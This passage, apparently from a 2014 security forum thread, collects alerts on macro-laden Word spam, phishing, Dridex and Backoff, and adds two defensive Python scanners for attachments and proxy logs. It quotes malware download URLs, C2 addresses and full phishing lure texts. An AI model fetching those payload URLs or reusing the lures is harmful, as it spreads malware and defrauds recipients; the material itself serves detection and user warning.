* https://www.virustotal.com/en/file/2723a595350cb632eac5f98a794265105e49e1be181a50437184482b32075b94/analysis/1414662840/

** http://myonlinesecurity.co.uk/new-photo-malware/
___

Malicious Browser Extensions
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-look-into-malicious-browser-extensions/
Oct 29, 2014 - "Malicious browser extensions bring about security risks as these often lead to system infection and unwanted spamming on Facebook. Based on our data, these attacks have notably affected users in Brazil. We have previously reported that cybercriminals are putting malicious browser extensions in the official Chrome Web store. We also came across malware that -bypasses- a Google security feature that checks third party extensions... we performed an in-depth analysis of malicious Chrome browser extension and its evasion tactics, after receiving samples in from Facebook. Facebook’s Security team conducts their own malware research and they regularly collaborate with Trend Micro to keep their service safe... Based on our data starting from May 2014 onwards, Trend Micro HouseCall has helped about 1,000,000 users whose computers have been infected by malicious browser extensions. The top affected countries are mostly located in the Latin American region, such as Brazil, Mexico, Colombia, and Peru.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/FB-extension-infection.jpg
... We strongly advise users to avoid clicking links from messages, even if they appear to come from your friends. Users can also opt to use Trend Micro HouseCall* to secure their systems from online threats, including those that may leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat. Below is the SHA1 hash of the malicious file:
4733c4ea00137497daad6d2eca7aea0aaa990b46 "
* http://housecall.trendmicro.com/
___

Popular Science site compromised
- http://community.websense.com/blogs/securitylabs/archive/2014/10/28/official-website-of-popular-science-is-compromised.aspx
28 Oct 2014 - "... injected with a malicious code that -redirects- users to websites serving exploit code, which subsequently drops malicious files on each victim's computer... injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit..."

:mad: :fear:
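Several of the posts above turn on the same two attachment tricks: an executable whose name ends in .pdf.exe or carries a "_pdf" token so that it shows a PDF icon when known extensions are hidden, and Word documents whose only payload is a VBA macro. The Crowti post also lists the campaign-style names (VOICE<digits>.scr, fax-id<digits>.exe, info_<digits>.pdf.exe). The block below is an added example, not code from any of the quoted blogs, that triages attachments on both name and content: it classifies filenames, opens zip attachments with the standard library to check the members, and looks past the name at the bytes (an MZ header is a Windows executable whatever it is called; an OLE compound file whose directory names a Macros or _VBA_PROJECT storage is a macro document; an OOXML zip containing vbaProject.bin likewise). The sample names, the in-memory zip and the fake OLE blob are constructed; the stem regex and extension sets are assumptions drawn only from the names quoted in this thread.

```python
"""Triage e-mail attachments for the disguises described in the posts above.

Added example, not code from the quoted blogs. classify_name() covers the
name tricks; inspect_content() checks the bytes independently of the name.
The sample names, the in-memory zip and the fake OLE blob are constructed.
"""
import io
import re
import zipfile

EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js",
                   "jse", "wsf", "hta", "cpl", "jar"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
MACRO_CAPABLE_EXTS = {"doc", "dot", "xls", "ppt", "docm", "xlsm", "pptm"}
# Theme word plus digits, modelled on the attachment names quoted in the thread.
CAMPAIGN_STEM = re.compile(
    r"^(voice|incomingfax|fax-id|fax|info|document|complaint_irs_id|invoice|"
    r"order_report)[-_]?\d+", re.IGNORECASE)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def classify_name(name):
    """Return (level, reasons) for a filename; level is high/medium/low."""
    base = re.split(r"[\\/]", name)[-1]
    parts = base.lower().split(".")
    if len(parts) < 2:
        return "medium", ["no extension"]
    stem, inner, ext = parts[0], parts[1:-1], parts[-1]
    reasons = []
    if CAMPAIGN_STEM.match(stem):
        reasons.append("campaign-style stem with digits")
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{ext}")
        if any(p in DOCUMENT_EXTS for p in inner):
            reasons.append("double extension disguising executable as document")
        if re.search(r"[-_ ]pdf$", stem):
            reasons.append("'pdf' token in stem of an executable")
        return "high", reasons
    if ext in MACRO_CAPABLE_EXTS:
        reasons.append(f".{ext} can carry VBA macros")
        return "medium", reasons
    if ext == "zip":
        return "medium", reasons + ["archive: inspect members"]
    return "low", reasons


def inspect_content(data):
    """Return content-based reasons that hold whatever the file is named."""
    reasons = []
    if data[:2] == b"MZ":
        reasons.append("MZ header: Windows executable regardless of name")
    elif data.startswith(OLE_MAGIC):
        # CFB directory entry names are stored UTF-16LE and uncompressed,
        # so a raw search finds the storages that hold VBA code.
        if any(tag.encode("utf-16-le") in data for tag in ("Macros", "_VBA_PROJECT")):
            reasons.append("OLE document with a VBA macro storage")
    elif data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
        except zipfile.BadZipFile:
            names = []
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            reasons.append("OOXML document with vbaProject.bin")
    return reasons


def scan_zip(data):
    """Classify each file inside a zip attachment by name and by content."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            level, reasons = classify_name(info.filename)
            content = inspect_content(zf.read(info))
            if content:  # any content finding overrides the name verdict
                level, reasons = "high", reasons + content
            results.append((info.filename, level, reasons))
    return results


def build_sample_zip():
    """Constructed archive: a job.pdf.exe stub, a fake macro .doc, a text file."""
    fake_doc = OLE_MAGIC + b"\x00" * 40 + "Macros".encode("utf-16-le") + b"\x00" * 8
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("job.pdf.exe", b"MZ\x90\x00 constructed stub, not a real binary")
        zf.writestr("CopyHA779333.doc", fake_doc)
        zf.writestr("readme.txt", b"plain text member")
    return buf.getvalue()


if __name__ == "__main__":
    for member, level, reasons in scan_zip(build_sample_zip()):
        print(f"{level:6} {member}: {'; '.join(reasons) or 'nothing notable'}")
```

The name check alone rates a .doc as medium, because legitimate documents use that extension too; the raw UTF-16 search for Macros or _VBA_PROJECT is what lifts the constructed CopyHA779333.doc to high. On real files that search is a heuristic (the string could occur in embedded data), so use it to decide what to detonate or feed to a proper OLE parser, not as a final verdict.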

AplusWebMaster
2014-10-31, 14:25
FYI...

Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
31 Oct 2014 - "This -fake- Amazon email comes with a malicious Word document attached:
From: Amazon.co.uk [auto-shipping@ amazon .co.uk]
Reply-To: "auto-shipping@ amazon .co.uk" [auto-shipping@ amazon .co.uk]
Date: 31 October 2014 09:12
Subject: Your Amazon.co.uk order has dispatched (#203-2083868-0173124)
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit ...
Your order #203-2083868-0173124 (received October 30, 2014) ...

The Word document contains a malicious macro... but is currently undetected at VirusTotal* (the Malwr report doesn't say much...). The macro then downloads http ://ctmail .me/1.exe and executes it. This malicious binary has a detection rate of 4/52**... 84.40.9.34 is Hostway in Belgium, 213.143.97.18 is Wien Energie, Austria. The malware also downloads a DLL as 2.tmp which has a detection rate of 3/54***.
Recommended blocklist:
213.143.97.18
84.40.9.34
ctmail .me "
* https://www.virustotal.com/en/file/30990e856868cf63c8b680aa333d687f38a1efe03c11aea1a290f30c5d6668ac/analysis/1414752406/

** https://www.virustotal.com/en/file/8c79bff0c302a0c1762fc59ab7001001a9293506197579213e087868493b756e/analysis/1414752639/

*** https://www.virustotal.com/en/file/7534ac5bbb9ff975a744c39320e7d372e80007a1896a04533a8a4b92633bf369/analysis/1414754766/

- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
* https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/1414744958/
___

Fake 'Confirmation' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/
31 Oct 2014 - "An email saying 'Please find attached Remittance and BACS confirmation for September and October Invoices' pretending to come from random names, companies and email addresses with a subject of 'Remittance Confirmation [random characters]' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Good morning,
Please find attached Remittance and BACS confirmation for September and October Invoices
Best Wishes
Lynn Blevins
Accounts Dept Assistant
Site Management Services (Central) Ltd ...

31 October 2014 : CU293705.doc - Current Virus total detections: 0/52*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5b38d77c33938254fa50ced98a7471dbe4b8ec2aceb1ae2863bb14c812f0f226/analysis/1414747524/
___

Chrome 40 to terminate use of SSL ...
- http://www.theregister.co.uk/2014/10/31/google_puts_down_poodle/
31 Oct 2014 - "... Update 40* will remove SSLv3 and the hard-to-exploit cookie-stealing Padding Oracle on Downgraded Legacy Encryption (POODLE) attack. Cupertino followed -Redmond- in its browser POODLE put-down after a single click FixIt SSLv3 disabler was issued for Internet Explorer** ahead of removal in a few months. Google security engineer Adam Langley wrote in an update that some buggy servers may stop working as a result... -Chrome- 39 will show a yellow flag over the SSL lock icon, the protocol design flaw that allowed hackers to hijack victims' online accounts and which prompted tech companies to dump SSLv3 in upcoming releases such as -Mozilla's- Firefox 34***..."
* https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4

** https://support.microsoft.com/kb/3009008#FixItForMe

*** https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/

:mad: :fear:

AplusWebMaster
2014-11-03, 15:52
FYI...

Fake invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/new-invoice-random-characters-created-word-doc-malware/
3 Nov 2014 - "An email saying 'A new invoice has been created. Please find it attached' pretending to come from TM Group Helpdesk Billing with a subject of 'A new invoice [random characters]' has been created for You' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Client,
A new invoice, WJ7647670C has been created. Please find it attached.
Kind regards, Marcellus Powell
TM Group
Helpdesk Billing

3 November 2014 : PI646028B.doc - Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3c31fec4b4f77ef581151d87313631956c18bbac82a30c389bdb59b3f5b1b31b/analysis/1415010191/

- http://blog.dynamoo.com/2014/11/tm-group-new-invoice-ab1234567c-has.html
3 Nov 2014
... Recommended blocklist:
91.222.139.45
213.140.115.29
149.62.168.210
111.125.170.132
121.78.88.208 "
___

Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
UPDATE 1: 2014-11-03 - "... different version of the attachment (called ORDER-203-2083868-0173124.doc) which has a VirusTotal detection rate of 0/54* and contains this malicious macro... This downloads a file from http ://hilfecenter-harz .de/1.exe which also has zero detections at VirusTotal... It also downloads a malicious DLL... this as a version of Cridex...
Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter-harz .de
garfield67 .de
* https://www.virustotal.com/en/file/554695f6d0cd97c2a31fc7f205f3ac3b364f0154d70be41685731f1226e8eeaf/analysis/1415004635/

:mad: :fear:
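
The 31 Oct and 3 Nov items above each end with a "Recommended blocklist" of IPs and domains. The following is an added example (not code from the forum thread or from the quoted blogs) showing how a defender would turn those lists into a check over outbound proxy logs: indicators are refanged from the posts' "host .tld" spelling, IPs are compared as addresses rather than substrings, and domains match only exactly or as the parent of a subdomain. The log format and the log lines are constructed for this example.

```python
"""Check proxy log lines against the blocklists published in the posts above.

Added example, not code from the forum thread or from the quoted blogs.
The indicators are the IPs and domains those posts recommend blocking;
the log format and the log lines below are constructed for this example.
"""
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Indicators exactly as the posts print them (defanged with a space before the TLD).
RAW_DOMAINS = ["ctmail .me", "hilfecenter-harz .de", "garfield67 .de"]
RAW_IPS = [
    "213.143.97.18", "84.40.9.34",                        # 31 Oct blocklist
    "91.222.139.45", "213.140.115.29", "149.62.168.210",  # 3 Nov blocklist
    "111.125.170.132", "121.78.88.208",
    "37.139.23.200",                                      # 3 Nov blocklist 2
]


def refang(indicator: str) -> str:
    """Remove the defanging spaces ('ctmail .me' -> 'ctmail.me', 'http ://x' -> 'http://x')."""
    return re.sub(r"\s+(?=[.:/])", "", indicator.strip()).lower()


BLOCKED_DOMAINS = {refang(d) for d in RAW_DOMAINS}
BLOCKED_IPS = {ipaddress.ip_address(i) for i in RAW_IPS}

# Constructed log format: timestamp client method url status (one request per line).
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})"
)

# Constructed sample log; only three of these requests touch a listed host.
SAMPLE_LOG = """\
2014-11-03T10:12:41 10.0.0.12 GET http://ctmail.me/1.exe 200
2014-11-03T10:12:44 10.0.0.12 GET http://213.143.97.18:8080/gate.php 200
2014-11-03T10:13:02 10.0.0.31 GET http://www.example.com/index.html 200
2014-11-03T10:14:10 10.0.0.45 POST http://cdn.garfield67.de/upload 200
2014-11-03T10:15:00 10.0.0.45 GET http://garfield67.de.example.org/ 200
2014-11-03T10:16:30 10.0.0.12 GET http://8.8.8.8/ 200
"""


def host_matches(host: str) -> Optional[str]:
    """Return the matching indicator for a host, or None.

    IPs are compared as addresses; domains match exactly or as a parent of a
    subdomain (cdn.garfield67.de hits, garfield67.de.example.org does not).
    """
    host = host.lower().rstrip(".")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        return host if ip in BLOCKED_IPS else None
    for dom in BLOCKED_DOMAINS:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse each log line and report requests whose host is on the blocklist."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        host = urlsplit(m.group("url")).hostname or ""
        indicator = host_matches(host)
        if indicator:
            hits.append({"ts": m.group("ts"), "client": m.group("client"),
                         "host": host, "indicator": indicator})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} -> {hit['host']} (blocklist: {hit['indicator']})")
```

The suffix match matters: a naive substring test would flag garfield67.de.example.org and miss nothing, but it would also produce false positives on any host that merely contains a listed name. Matching on the exact host or a dot-separated parent keeps the hits tied to the listed infrastructure.
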

AplusWebMaster
2014-11-04, 14:03
FYI...

Fake 'New order' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/new-order-7757100-site-word-doc-malware/
4 Nov 2014 - "'New order 7757100' from site is an email saying 'Thank you for ordering' pretending to come from random names at random companies with a subject of 'New order 7757100 from site' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is -malformed- and contains a macro script virus... DO NOT follow the advice they give to enable macros to see the content. Almost all of these malicious word documents appear to be -blank- when opened...

Screenshots: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/New-order-7757100-from-site.png

- http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/protected-view-macros.png

4 November 2014 : Order561104135.doc - Current Virus total detections: 1/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/16e0fbdbab2fd8d88e8ab1a7ca42e4dc2ea9682ede6a06e6c3a85dae499cec1b/analysis/1415093505/
___

Fake 'Remittance' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duco-remittance-advice-november-word-doc-malware/
4 Nov 2014 - "An email saying 'Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP' pretending to come from DUCO with a subject of 'Remittance Advice November' [random characters] with a malicious word document attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Dear Sir/Madam
Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP
Regards,
Domenic Burton
Accounts Payable Department DUCO

4 November 2014 : De_BW574826C.doc - Current Virus total detections: 0/44*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/792e5c3c2886d6fe7d0b10a25fd78023a7b862a79bd6e461a5e23ecccbc371ef/analysis/1415106043/

- http://blog.dynamoo.com/2014/11/duco-remittance-advice-november-spam.html
4 Nov 2014
- https://www.virustotal.com/en/file/3d6378750d713270bbafc1a18754626d148396253429a6a70c018eadb988120a/analysis/1415110852/
... Behavioural information
TCP connections
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
213.140.115.29: https://www.virustotal.com/en/ip-address/213.140.115.29/information/
___

'C-93 Virus Alert' - Phish ...
- http://www.hoax-slayer.com/C93-virus-alert-phishing-scam.shtml
Nov 4, 2014 - "An email claiming to be from Windows Outlook warns that a 'C93 Virus' has been detected in your mailbox and you are therefore -required- to -click- a link to run a Norton anti-virus scan to resolve the issue. The email is -not- from Outlook or Microsoft. It is a phishing scam designed to trick you into giving your Microsoft Account login details to criminals... According to this email, which claims to be from 'Windows Outlook', a 'C93 Virus' has been detected in your mailbox. The message instructs you to click a link to run a Norton anti-virus scan that will 'remove all Trojan and viral bugs' from your account. But, warns the message, if you fail to run the scan, your mailbox will be -deactivated- ... Example:
Dear Outlook Member,
A C93 Virus has been detected in your mailbox, You are required to apply the new Norton AV security anti-virus to scan and to remove all Trojan and viral bugs from your mailbox Account, Failure to apply the scan your mailbox will be De-Activated to avoid our database from being infected.
Click on Optimal Scan and Log in to apply the service.
Thank you ...

If you click the link, you will be taken to a -fake- webpage that is designed to look like a genuine Microsoft account login. When you enter your login details and click the 'Sign In' button, you will be automatically -redirected- to a genuine Microsoft account page... the criminals can collect your login details and use them to hijack your real Microsoft Account. Because the same credentials are used to login to various Microsoft services, they are a valuable commodity for scammers... If you receive one of these -fake- virus warnings, do -not- click any links or open any attachments..."
___

Bitcoin bonanza - or blunders?
- https://www.virusbtn.com/blog/2014/11_04.xml
4 Nov 2014 - "... 'occasionally losing a lot of money through bugs and blunders'... 'hard not to feel dizzy and somewhat overwhelmed by the security issues and implications.'
> https://www.virusbtn.com/virusbulletin/archive/2014/11/figures/Pontiroli-1.jpg
Malware targeting Bitcoin wallets or using other people's resources to mine for cryptocurrencies is perhaps the least of our worries. What about virus code (or worse, child abuse material) ending up in the blockchain? Or the common flaw of transaction malleability? Or the almost existential threat of the "51% attack"? Cryptocurrencies are here to stay, but they come with their own unique set of problems that we cannot ignore... we're not in Kansas anymore..."
(More detail at the top virusbtn URL.)

- https://www.virusbtn.com/blog/2014/10_31a.xml
31 Oct 2014
___

Facebook: gov't requests for user data rises 24%
- http://www.reuters.com/article/2014/11/04/us-facebook-data-idUSKBN0IO21Z20141104
Nov 4, 2014 - "Facebook Inc said requests by governments for user information rose by about a quarter in the first half of 2014 over the second half of last year. In the first six months of 2014, governments around the world made 34,946 requests for data. During the same time, the amount of content restricted because of local laws increased about 19 percent... Google reported in September a 15 percent sequential increase in the number of requests in the first half of this year, and a 150 percent rise in the last five years, from governments around the world to reveal user information in criminal investigations."

:mad: :fear:

AplusWebMaster
2014-11-05, 15:31
FYI...

Backoff PoS malware - stealthier, more difficult to analyze
- http://net-security.org/malware_news.php?id=2906
Nov 5, 2014 - "... Backoff infections are still on the rise. Fortinet researchers* have recently managed to get their hands on a new Backoff variant that shows that its authors haven't been idle. This version also does not have a version number, but has been given the name Backoff ROM. Compared to the older versions, Backoff ROM disguises itself as a media player (mplayerc.exe) instead of a Java component in the autorun registry entries... Traffic between the malware and the C&C server is also encrypted, and the way the server responds with new commands for the malware has been simplified... for whatever reason, this new Backoff version does not have keylogging capabilities. But, the researchers believe that this is only a temporary change that will be reversed in newer versions..."
* http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware

- https://www.damballa.com/state-infections-report-q3-2014/
10/24/2014
> https://www.damballa.com/wp-content/uploads/2014/10/soi-q3-2014.jpg

- http://atlas.arbor.net/briefs/index#1351521298
Elevated Severity
6 Nov 2014
Analysis: Since approximately Sep 8, 2014, this new version of the Backoff PoS malware has been classified in the ASERT malware analysis infrastructure, which contains at least three hundred distinct instances of Backoff... Easily compromised systems proliferate, and weak remote access deployments are often the culprit. Among the more difficult to compromise systems, tactics such as spear phishing, vendor compromise, partner attacks featuring lateral movement and other strategies well-known to more dedicated threat actors are bearing fruit for the attackers. Proper isolation, hardening, and monitoring of PoS deployments and associated infrastructure are crucial to reducing risks and detecting attackers that may already be present. PoS is squarely in the sights of many threat actors which means that organizations running PoS and their support infrastructure must realize that they are a target...
Source: http://www.net-security.org/malware_news.php?id=2906
___

Banking Trojan DRIDEX uses Macros for Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Nov 5, 2013 - "... DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.
Sample spammed message
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex1.png
The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled — which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware:
Malicious attachment instructing users to enable the macro feature:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex2.png
It then performs information theft through methods like form grabbing, screenshots, and site injections... Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature. The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if it was able to trick the user into clicking the malicious link. In a macro spam attack, there is always that possibility that the user will be tricked into enabling the macro feature...
Top affected countries, based on data from September-October 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex4.jpg
We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.
Top DRIDEX spam sending countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex5.jpg
... best to make sure to enable the macro security features* in Office applications. For organizations, IT administrators can enforce such security measures via Group Policy settings..."
* https://office.microsoft.com/en-us/visio-help/about-macro-security-levels-HP001049689.aspx
___

'Free' Netflix Accounts: Good Luck With That...
- https://blog.malwarebytes.org/fraud-scam/2014/11/sites-offering-free-netflix-accounts-good-luck-with-that/
Nov 5, 2014 - "We’ve seen a number of Netflix themed websites which claim to offer up accounts / logins for fans of TV and movie streaming to get their fix -without- having to register or -pay- up to use the service...
1) freenetflixaccount(dot)info
This one is rather cookie-cutter and claims to have lots of accounts up for grab, linking to numerous “Netflix premium account” URLs further down the page.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx1.jpg?w=564
However, all of the live links lead to the same survey page:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx4.jpg
To get your hands on the supposed account credentials, you’d have to fill in an offer or sign up to whatever happens to be presented to you. Am I sensing an incoming theme here?…
2) freenetflixaccountasap(dot)com
This website has the visitor play an extremely long-winded and elaborate game of “click the thing”, distracting them with lots of options to choose from in order to watch some movies.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx5.jpg
... According to the text underneath the many scrolling blue bars, they claim to log you into an account from your chosen region via proxy, set up a bunch of options then log you out. They then “upload the account details” to Fileice, and ask the visitor to “Click below to download the login details”.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx12.jpg
... > https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx13.jpg
... Interesting to note that the “newly created” page has an entry on VirusTotal* from just over a week ago... Always be wary when presented with supposedly free accounts – remember that there’s something in it for the person offering them up, and it could be anything from survey scam affiliate cash and fakeouts to phishing and Malware attacks..."
* https://www.virustotal.com/en/url/d7d219b5549e7159b0722596750bcdbe6345eb39af17d24105735a03fd345e95/analysis/
___

E-ZPass SPAM/Phish ...
- http://www.networkworld.com/article/2842773/security0/have-e-zpass-watch-out-for-slimy-asprox-based-malware-ploy.html
Nov 3, 2014 - "The Internet Crime Complaint Center* today said it has gotten more than 560 complaints about a rip-off using the E-ZPass vehicle toll collection system that uses phishing techniques to deliver malware to your computer. E-ZPass is an association of 26 toll agencies in 15 states that operate the E-ZPass toll collection program..."
* https://www.ic3.gov/media/2014/141103.aspx
"... The IC3 has received more than 560 complaints in which a victim receives an e-mail stating they have not paid their toll bill. The e-mail gives instructions to download the invoice by using the link provided, but the -link- is actually a .zip file that contains an executable with location aware malware. Some of the command and control server locations are associated with the ASProx botnet..."

- http://stopmalvertising.com/spam-scams/e-zpass-themed-emails-lead-to-asprox.html
9 July 2014
Screenshot: http://stopmalvertising.com/research/images/ezpass-asprox.jpg
___

20 million new strains of malware - Q3 2014
- http://www.pandasecurity.com/mediacenter/malware/over-20-million-new-strains-of-malware-were-indentified-in-q3-2014/
Oct 31, 2014 - "... some 20 million new strains were created worldwide in the third quarter of the year, at a rate of 227,747 new samples every day. Similarly, the global infection ratio was 37.93%, slightly up on the previous quarter (36.87%)... Trojans are still the most common type of malware (78.08%). A long way behind in second place come viruses (8.89), followed by worms (3.92%)... Trojans also accounted for most infections during this period, some 75% of the total, compared with 62.80% in the previous quarter. PUPs are still in second place, responsible for 14.55% of all infections, which is down on the second quarter figure of 24.77. These are followed by adware/spyware (6.88%), worms (2.09%), and viruses (1.48)..."

:mad: :fear:

AplusWebMaster
2014-11-06, 14:20
FYI...

Fake Amazon SPAM - Word doc malware
- http://blog.mxlab.eu/2014/11/06/w97mdownloader-t-threat-attached-as-word-file-to-fake-emails-from-amazon-regarding-dispatched-order/
Nov 6, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Amazon .co.uk order has dispatched (#203-2083868-0173124)”. This email is sent from the spoofed address “Amazon .co.uk” <auto-shipping@ amazon .co.uk>” and has the following body:
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit: http ://www.amazon .co.uk/your-account
Your order #203-2083868-0173124 (received November 5, 2014)
Your right to cancel:
At Amazon .co.uk we want you to be delighted every time you shop with us. Occasionally though, we know you may want to return items. Read more about our Returns Policy at: http ://www.amazon .co.uk/returns-policy/
Further, under the United Kingdom’s Distance Selling Regulations, you have the right to cancel the contract for the purchase of any of these items within a period of 7 working days... If you’ve explored the above links but still need to get in touch with us, you will find more contact details at the online Help Desk.
Note: this e-mail was sent from a notification-only e-mail address that cannot accept incoming e-mail.
Please do not reply to this message.
Thank you for shopping at Amazon .co.uk

The attached file has the name Mail Attachment.doc and is an approx. 230 kB file. The malicious Word file is detected as W97M/Downloader.t, W97M.DownLoader.110 or W97M.Dropper.Obfus. At the time of writing, 4 of the 54 AV engines did detect the malicious file at Virus Total*..."
* https://www.virustotal.com/en/file/99077f53365f931bddb4028793f9722c25b7095ae61eae3f6b31f9d7225e8c27/analysis/1415272790/

- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
- https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/
___

Fake 'Order' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/successfull_order-032574522-word-doc-malware/
6 Nov 2014 - "An email saying 'This is a notice that the invoice has been generated on 05.11.2014' pretending to come from random names at random companies with a subject of 'Successfull_Order 032574522' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear Customer, [redacted]
This is a notice that the invoice has been generated on 05.11.2014.
Your payment method is: credit card.
The order reference is 468824369.
Your credit card will be charged for 47.40 USD.
The payment and delivery information is in attached file.
Regards,
Systems Company,
Crocitto Greta

6 November 2014 : Order561104111.doc - Current Virus total detections: 6/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... embedded malware or macro..."
* https://www.virustotal.com/en/file/d16c465aade28e04c2b5d9488f8698affccd7e7dc0bf36b3ecfa996d33bcd7f6/analysis/1415152827/
___

Fake Bank SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-banque-royale-bank-interac-guillaume-gilnaught-fake-pdf-malware/
6 Nov 2014 - "'The Bank INTERAC to Guillaume Gilnaught was accepted' pretending to come from RBC Banque Royale < ibanking@ rbc .com > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/The-Bank-INTERAC-to-Guillaume-Gilnaught-was-accepted.png

6 November 2014: INTERAC_pmt_11062014_0345875.zip: Extracts to: INTERAC_pmt_11062014_0345875.exe
